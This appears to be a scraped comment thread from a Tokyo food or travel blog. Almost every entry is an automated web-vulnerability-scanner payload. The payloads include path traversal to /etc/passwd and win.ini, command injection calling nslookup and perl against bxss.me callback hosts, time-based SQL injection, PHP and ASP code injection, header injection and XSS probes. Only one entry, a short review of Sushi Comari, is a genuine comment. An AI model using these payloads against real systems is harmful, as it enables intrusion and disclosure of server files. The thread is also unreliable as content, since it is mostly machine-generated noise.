re: thetokyogourmet
$(nslookup hitsshmcbyxuc5a666.bxss.me||perl -e "gethostbyname('hitsshmcbyxuc5a666.bxss.me')")
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
&nslookup hitkerkhmdxur46a05.bxss.me&'\"`0&nslookup hitkerkhmdxur46a05.bxss.me&`'
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
&(nslookup hitvslfoiwqjy4932a.bxss.me||perl -e "gethostbyname('hitvslfoiwqjy4932a.bxss.me')")&'\"`0&(nslookup hitvslfoiwqjy4932a.bxss.me||perl -e "gethostbyname('hitvslfoiwqjy4932a.bxss.me')")&`'
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(101).concat(74).concat(103).concat(74)+(require"socket"
Socket.gethostbyname("hitjj"+"mxqcyiyw85fa9.bxss.me.")[3].to_s)+"
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
|(nslookup hitlrlychjwseb7377.bxss.me||perl -e "gethostbyname('hitlrlychjwseb7377.bxss.me')")
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(112).concat(83).concat(117).concat(88)+(require'socket'
Socket.gethostbyname('hitxt'+'efzenbipa494e.bxss.me.')[3].to_s)+'
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
`(nslookup hitwbonofmepbbadb5.bxss.me||perl -e "gethostbyname('hitwbonofmepbbadb5.bxss.me')")`
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
;(nslookup hitienimekccz5b696.bxss.me||perl -e "gethostbyname('hitienimekccz5b696.bxss.me')")|(nslookup hitienimekccz5b696.bxss.me||perl -e "gethostbyname('hitienimekccz5b696.bxss.me')")&(nslookup hitienimekccz5b696.bxss.me||perl -e "gethostbyname('hitienimekccz5b696.bxss.me')")
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
bxss.me
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
'"
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
<!--
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+680-680-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+680-680-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+631-631-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+631-631-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+979-979-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+979-979-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+840-840-1=0+0+0+1 or 'vOs46dow'='
re: thetokyogourmet
-1' OR 3+840-840-1=0+0+0+1 or 'vOs46dow'='
re: thetokyogourmet
-1" OR 2+420-420-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+420-420-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
4MB2hgCD'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 751=(SELECT 751 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 36=(SELECT 36 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 711=(SELECT 711 FROM PG_SLEEP(15))--
re: thetokyogourmet
EfoOuYeT' OR 899=(SELECT 899 FROM PG_SLEEP(15))--
re: thetokyogourmet
xCjGctvE') OR 725=(SELECT 725 FROM PG_SLEEP(15))--
re: thetokyogourmet
Ji73ObWR')) OR 478=(SELECT 478 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@UbwoJ
Just went to Sushi Comari on this list, while it wasn't really my cup of tea. Superb CP, 8k Lunch for 13 nigiri. A good spot for travellers on a budget, who want a omakase fix.
re: Wanderlusting
1C7TIFqKEgO
re: Wanderlusting
%0abcc:074625.67-22090.67.c4d95.19990.2@bxss.me
re: Wanderlusting
response.write(9132895*9632606)
re: Wanderlusting
to@example.com>%0d%0abcc:074625.67-22091.67.c4d95.19990.2@bxss.me
re: Wanderlusting
'+response.write(9132895*9632606)+'
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
"+response.write(9132895*9632606)+"
re: Wanderlusting
${10000089+9999612}
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../../proc/version
re: Wanderlusting
'.gethostbyname(lc('hitda'.'qicmqcym80ae1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(84).chr(116).chr(87).'
re: Wanderlusting
)
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Wanderlusting
".gethostbyname(lc("hitjg"."bcqrpqfi08b0d.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(66).chr(98).chr(65)."
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
../../../../../../../../../../etc/passwd%00.jpg
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Wanderlusting
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Wanderlusting
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Wanderlusting
echo qivmes$()\ fmnbxo\nz^xyu||a #' &echo qivmes$()\ fmnbxo\nz^xyu||a #|" &echo qivmes$()\ fmnbxo\nz^xyu||a #
re: Wanderlusting
/etc/passwd
re: Wanderlusting
&echo pgiyuj$()\ gracjl\nz^xyu||a #' &echo pgiyuj$()\ gracjl\nz^xyu||a #|" &echo pgiyuj$()\ gracjl\nz^xyu||a #
re: Wanderlusting
%2fetc%2fpasswd
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
|echo yjivhn$()\ potpyj\nz^xyu||a #' |echo yjivhn$()\ potpyj\nz^xyu||a #|" |echo yjivhn$()\ potpyj\nz^xyu||a #
re: Wanderlusting
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(97).concat(77).concat(107).concat(80)+(require"socket"
Socket.gethostbyname("hityj"+"smwyylcwac5f1.bxss.me.")[3].to_s)+"
re: Wanderlusting
(nslookup hitubvlcojbwiec29f.bxss.me||perl -e "gethostbyname('hitubvlcojbwiec29f.bxss.me')")
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(119).concat(65).concat(118).concat(75)+(require'socket'
Socket.gethostbyname('hitqt'+'vxzaobuc4292a.bxss.me.')[3].to_s)+'
re: Wanderlusting
$(nslookup hitbkmkozwgeqc6c21.bxss.me||perl -e "gethostbyname('hitbkmkozwgeqc6c21.bxss.me')")
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
&nslookup hitnzbkbwhocj90313.bxss.me&'\"`0&nslookup hitnzbkbwhocj90313.bxss.me&`'
re: Wanderlusting
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Wanderlusting
http://bxss.me/t/fit.txt%3F.jpg
re: Wanderlusting
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Wanderlusting
&(nslookup hitzadbucukfqe10de.bxss.me||perl -e "gethostbyname('hitzadbucukfqe10de.bxss.me')")&'\"`0&(nslookup hitzadbucukfqe10de.bxss.me||perl -e "gethostbyname('hitzadbucukfqe10de.bxss.me')")&`'
re: Wanderlusting
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Wanderlusting
/etc/shells
re: Wanderlusting
|(nslookup hitmwkuftkssba4d7b.bxss.me||perl -e "gethostbyname('hitmwkuftkssba4d7b.bxss.me')")
re: Wanderlusting
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
'"
re: Wanderlusting
`(nslookup hithywiafcsbf023a0.bxss.me||perl -e "gethostbyname('hithywiafcsbf023a0.bxss.me')")`
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
bxss.me
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
<!--
re: Wanderlusting
;(nslookup hitazrmkydaiac4dea.bxss.me||perl -e "gethostbyname('hitazrmkydaiac4dea.bxss.me')")|(nslookup hitazrmkydaiac4dea.bxss.me||perl -e "gethostbyname('hitazrmkydaiac4dea.bxss.me')")&(nslookup hitazrmkydaiac4dea.bxss.me||perl -e "gethostbyname('hitazrmkydaiac4dea.bxss.me')")
re: Wanderlusting
/\../\../\../\../\../\../\../etc/passwd
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
/WEB-INF/web.xml
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
C:\WINDOWS\system32\drivers\etc\hosts
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
../../../../../../../../../../windows/win.ini%00.jpg
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
/../../../../../../../../../../boot.ini
re: Wanderlusting
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Wanderlusting
..\..\..\..\..\..\..\..\windows\win.ini
re: Wanderlusting
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Wanderlusting
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Wanderlusting
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\